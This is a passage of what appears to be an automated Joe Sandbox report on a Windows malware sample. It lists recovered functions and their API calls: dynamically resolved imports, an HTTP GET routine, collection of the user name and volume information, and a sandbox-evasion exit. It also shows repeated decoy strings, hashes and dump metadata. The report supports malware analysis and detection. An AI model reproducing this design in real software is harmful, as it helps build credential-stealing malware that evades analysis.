The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F46D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005F471D

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: d97f4390c073a75e58d28b46a2dc1df2dc545cc4cbcff0cebc184c193140abdf
Instruction ID: 320a0190f1cee614f03bdfbb63311be05bee5c717883a68e79f0ec26012cbdd2
Opcode Fuzzy Hash: d97f4390c073a75e58d28b46a2dc1df2dc545cc4cbcff0cebc184c193140abdf
Instruction Fuzzy Hash: 114155607C361CAEE625BBBC8842DDDB653FF82F0AF4D5840A88552296DAF067804776

Function 005F62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005F4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4889
Part of subcall function 005F4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4899

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

InternetOpenA.WININET(00610DFF,00000001,00000000,00000000,00000000), ref: 005F6331
StrCmpCA.SHLWAPI(?,00F4FD10), ref: 005F6353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6385
HttpOpenRequestA.WININET(00000000,GET,?,00F4F4E8,00000000,00000000,00400100,00000000), ref: 005F63D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F6421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005F644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005F64BD
InternetCloseHandle.WININET(00000000), ref: 005F653F
InternetCloseHandle.WININET(00000000), ref: 005F6549
InternetCloseHandle.WININET(00000000), ref: 005F6553

Strings

GET, xrefs: 005F63CC
ERROR, xrefs: 005F6519
ERROR, xrefs: 005F6457

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 80e8ea345e4d658ba3b35f9dab50a40246920fd52b2dd2fbbc6befb55542a3ab
Instruction ID: 4147ef5847c3d6b10ccf8da37c7752b8a255739c37e2e1ea2517f5366fa5e38b
Opcode Fuzzy Hash: 80e8ea345e4d658ba3b35f9dab50a40246920fd52b2dd2fbbc6befb55542a3ab
Instruction Fuzzy Hash: 47715B71A40218ABDB24EFE0CC59FEE7779BB44700F508598F20A6B1D4DBB46A84CF55

Function 00607690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006076D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0060770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607793
RtlAllocateHeap.NTDLL(00000000), ref: 0060779A
wsprintfA.USER32 ref: 006077D0

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Strings

C, xrefs: 006076DC
:, xrefs: 006076EC
\, xrefs: 006076F0

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 5f850fee197307f5d208fd3150609ba96242db70ed4961d4f37225ac2bffb52d
Instruction ID: 93c2af4d10ddfd57987e1c3609f170ea169362ef9a01e202da63a43d8bfdb172
Opcode Fuzzy Hash: 5f850fee197307f5d208fd3150609ba96242db70ed4961d4f37225ac2bffb52d
Instruction Fuzzy Hash: AD418FB1D44248ABDB14DB94DC85FDEBBB9AF08700F104099F609AB2C0D7746A44CBA5

Function 006079E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607A10
RtlAllocateHeap.NTDLL(00000000), ref: 00607A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00607A2F

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: a0c87c76d6f5e482d35b0c535b2a125e76650eda8e6e1505f88c2a4bca07e80c
Instruction ID: 7548bc9d486833cce56649c1dabcce050aef418c086a18e57fe09cf146d5ca95
Opcode Fuzzy Hash: a0c87c76d6f5e482d35b0c535b2a125e76650eda8e6e1505f88c2a4bca07e80c
Instruction Fuzzy Hash: 70F04FB1948209EBCB04DF98DD45FAEBBB8FB05711F10021AF615A2680C7B515008BA1

Function 005F1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 005F116A
ExitProcess.KERNEL32 ref: 005F117E

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 2b10595084d593a76263914c1a173fcf2f88723218de78fa10c303bf2f375b11
Instruction ID: d551d7cb152a5fe32e50cad5b6b7fa13a3880e2f161df16013adf1341301ae3e
Opcode Fuzzy Hash: 2b10595084d593a76263914c1a173fcf2f88723218de78fa10c303bf2f375b11
Instruction Fuzzy Hash: E0D09E7490430CDBCB04DFE19949AEDBB78BB08625F140555D90562640EA315455CA65

Function 00609F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00F35548), ref: 00609F3D
GetProcAddress.KERNEL32(76210000,00F35668), ref: 00609F55
GetProcAddress.KERNEL32(76210000,00F49040), ref: 00609F6E
GetProcAddress.KERNEL32(76210000,00F49070), ref: 00609F86
GetProcAddress.KERNEL32(76210000,00F48FB0), ref: 00609F9E
GetProcAddress.KERNEL32(76210000,00F4DE08), ref: 00609FB7
GetProcAddress.KERNEL32(76210000,00F3A7C0), ref: 00609FCF
GetProcAddress.KERNEL32(76210000,00F4DE68), ref: 00609FE7
GetProcAddress.KERNEL32(76210000,00F4DE50), ref: 0060A000
GetProcAddress.KERNEL32(76210000,00F4DDD8), ref: 0060A018
GetProcAddress.KERNEL32(76210000,00F4DEF8), ref: 0060A030
GetProcAddress.KERNEL32(76210000,00F353C8), ref: 0060A049
GetProcAddress.KERNEL32(76210000,00F35508), ref: 0060A061
GetProcAddress.KERNEL32(76210000,00F354C8), ref: 0060A079
GetProcAddress.KERNEL32(76210000,00F356E8), ref: 0060A092
GetProcAddress.KERNEL32(76210000,00F4DF10), ref: 0060A0AA
GetProcAddress.KERNEL32(76210000,00F4DF58), ref: 0060A0C2
GetProcAddress.KERNEL32(76210000,00F3A928), ref: 0060A0DB
GetProcAddress.KERNEL32(76210000,00F35368), ref: 0060A0F3
GetProcAddress.KERNEL32(76210000,00F4DE80), ref: 0060A10B
GetProcAddress.KERNEL32(76210000,00F4DF28), ref: 0060A124
GetProcAddress.KERNEL32(76210000,00F4DF40), ref: 0060A13C
GetProcAddress.KERNEL32(76210000,00F4DE98), ref: 0060A154
GetProcAddress.KERNEL32(76210000,00F354E8), ref: 0060A16D
GetProcAddress.KERNEL32(76210000,00F4DDF0), ref: 0060A185
GetProcAddress.KERNEL32(76210000,00F4DEB0), ref: 0060A19D
GetProcAddress.KERNEL32(76210000,00F4DE38), ref: 0060A1B6
GetProcAddress.KERNEL32(76210000,00F4DEC8), ref: 0060A1CE
GetProcAddress.KERNEL32(76210000,00F4DF70), ref: 0060A1E6
GetProcAddress.KERNEL32(76210000,00F4DDC0), ref: 0060A1FF
GetProcAddress.KERNEL32(76210000,00F4DEE0), ref: 0060A217
GetProcAddress.KERNEL32(76210000,00F4DE20), ref: 0060A22F
GetProcAddress.KERNEL32(76210000,00F4DA48), ref: 0060A248
GetProcAddress.KERNEL32(76210000,00F3FDD8), ref: 0060A260
GetProcAddress.KERNEL32(76210000,00F4D910), ref: 0060A278
GetProcAddress.KERNEL32(76210000,00F4D838), ref: 0060A291
GetProcAddress.KERNEL32(76210000,00F35528), ref: 0060A2A9
GetProcAddress.KERNEL32(76210000,00F4D808), ref: 0060A2C1
GetProcAddress.KERNEL32(76210000,00F35388), ref: 0060A2DA
GetProcAddress.KERNEL32(76210000,00F4DAA8), ref: 0060A2F2
GetProcAddress.KERNEL32(76210000,00F4D958), ref: 0060A30A
GetProcAddress.KERNEL32(76210000,00F353E8), ref: 0060A323
GetProcAddress.KERNEL32(76210000,00F35408), ref: 0060A33B
LoadLibraryA.KERNEL32(00F4D970,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A34D
LoadLibraryA.KERNEL32(00F4D9D0,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A35E
LoadLibraryA.KERNEL32(00F4DA30,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A370
LoadLibraryA.KERNEL32(00F4D988,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A382
LoadLibraryA.KERNEL32(00F4D7C0,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A393
LoadLibraryA.KERNEL32(00F4D9E8,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A3A5
LoadLibraryA.KERNEL32(00F4D8C8,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A3B7
LoadLibraryA.KERNEL32(00F4D8E0,?,00605EF3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE7), ref: 0060A3C8
GetProcAddress.KERNEL32(751E0000,00F35288), ref: 0060A3EA
GetProcAddress.KERNEL32(751E0000,00F4D9A0), ref: 0060A402
GetProcAddress.KERNEL32(751E0000,00F48BB8), ref: 0060A41A
GetProcAddress.KERNEL32(751E0000,00F4D880), ref: 0060A433
GetProcAddress.KERNEL32(751E0000,00F35268), ref: 0060A44B
GetProcAddress.KERNEL32(701C0000,00F3A900), ref: 0060A470
GetProcAddress.KERNEL32(701C0000,00F350C8), ref: 0060A489
GetProcAddress.KERNEL32(701C0000,00F3A798), ref: 0060A4A1
GetProcAddress.KERNEL32(701C0000,00F4D8F8), ref: 0060A4B9
GetProcAddress.KERNEL32(701C0000,00F4DA78), ref: 0060A4D2
GetProcAddress.KERNEL32(701C0000,00F34F48), ref: 0060A4EA
GetProcAddress.KERNEL32(701C0000,00F352A8), ref: 0060A502
GetProcAddress.KERNEL32(701C0000,00F4D9B8), ref: 0060A51B
GetProcAddress.KERNEL32(753A0000,00F34F68), ref: 0060A53C
GetProcAddress.KERNEL32(753A0000,00F35028), ref: 0060A554
GetProcAddress.KERNEL32(753A0000,00F4D820), ref: 0060A56D
GetProcAddress.KERNEL32(753A0000,00F4D8B0), ref: 0060A585
GetProcAddress.KERNEL32(753A0000,00F35088), ref: 0060A59D
GetProcAddress.KERNEL32(76310000,00F3A748), ref: 0060A5C3
GetProcAddress.KERNEL32(76310000,00F3A8B0), ref: 0060A5DB
GetProcAddress.KERNEL32(76310000,00F4D850), ref: 0060A5F3
GetProcAddress.KERNEL32(76310000,00F350E8), ref: 0060A60C
GetProcAddress.KERNEL32(76310000,00F35108), ref: 0060A624
GetProcAddress.KERNEL32(76310000,00F3A8D8), ref: 0060A63C
GetProcAddress.KERNEL32(76910000,00F4D868), ref: 0060A662
GetProcAddress.KERNEL32(76910000,00F35128), ref: 0060A67A
GetProcAddress.KERNEL32(76910000,00F48BA8), ref: 0060A692
GetProcAddress.KERNEL32(76910000,00F4DA00), ref: 0060A6AB
GetProcAddress.KERNEL32(76910000,00F4DA90), ref: 0060A6C3
GetProcAddress.KERNEL32(76910000,00F34FA8), ref: 0060A6DB
GetProcAddress.KERNEL32(76910000,00F351E8), ref: 0060A6F4
GetProcAddress.KERNEL32(76910000,00F4D898), ref: 0060A70C
GetProcAddress.KERNEL32(76910000,00F4D7D8), ref: 0060A724
GetProcAddress.KERNEL32(75B30000,00F35248), ref: 0060A746
GetProcAddress.KERNEL32(75B30000,00F4D7F0), ref: 0060A75E
GetProcAddress.KERNEL32(75B30000,00F4DA18), ref: 0060A776
GetProcAddress.KERNEL32(75B30000,00F4D928), ref: 0060A78F
GetProcAddress.KERNEL32(75B30000,00F4D940), ref: 0060A7A7
GetProcAddress.KERNEL32(75670000,00F35148), ref: 0060A7C8
GetProcAddress.KERNEL32(75670000,00F35228), ref: 0060A7E1
GetProcAddress.KERNEL32(76AC0000,00F35048), ref: 0060A802
GetProcAddress.KERNEL32(76AC0000,00F4DA60), ref: 0060A81A
GetProcAddress.KERNEL32(6F4E0000,00F350A8), ref: 0060A840
GetProcAddress.KERNEL32(6F4E0000,00F35168), ref: 0060A858
GetProcAddress.KERNEL32(6F4E0000,00F352C8), ref: 0060A870
GetProcAddress.KERNEL32(6F4E0000,00F4DC10), ref: 0060A889
GetProcAddress.KERNEL32(6F4E0000,00F352E8), ref: 0060A8A1
GetProcAddress.KERNEL32(6F4E0000,00F34F88), ref: 0060A8B9
GetProcAddress.KERNEL32(6F4E0000,00F35068), ref: 0060A8D2
GetProcAddress.KERNEL32(6F4E0000,00F35308), ref: 0060A8EA
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0060A901
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0060A917
GetProcAddress.KERNEL32(75AE0000,00F4DAD8), ref: 0060A939
GetProcAddress.KERNEL32(75AE0000,00F48C38), ref: 0060A951
GetProcAddress.KERNEL32(75AE0000,00F4DD48), ref: 0060A969
GetProcAddress.KERNEL32(75AE0000,00F4DAF0), ref: 0060A982
GetProcAddress.KERNEL32(76300000,00F35328), ref: 0060A9A3
GetProcAddress.KERNEL32(6FE30000,00F4DB80), ref: 0060A9C4
GetProcAddress.KERNEL32(6FE30000,00F34FC8), ref: 0060A9DD
GetProcAddress.KERNEL32(6FE30000,00F4DC40), ref: 0060A9F5
GetProcAddress.KERNEL32(6FE30000,00F4DC70), ref: 0060AA0D

Strings

HttpQueryInfoA, xrefs: 0060A90C
InternetSetOptionA, xrefs: 0060A8F5

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
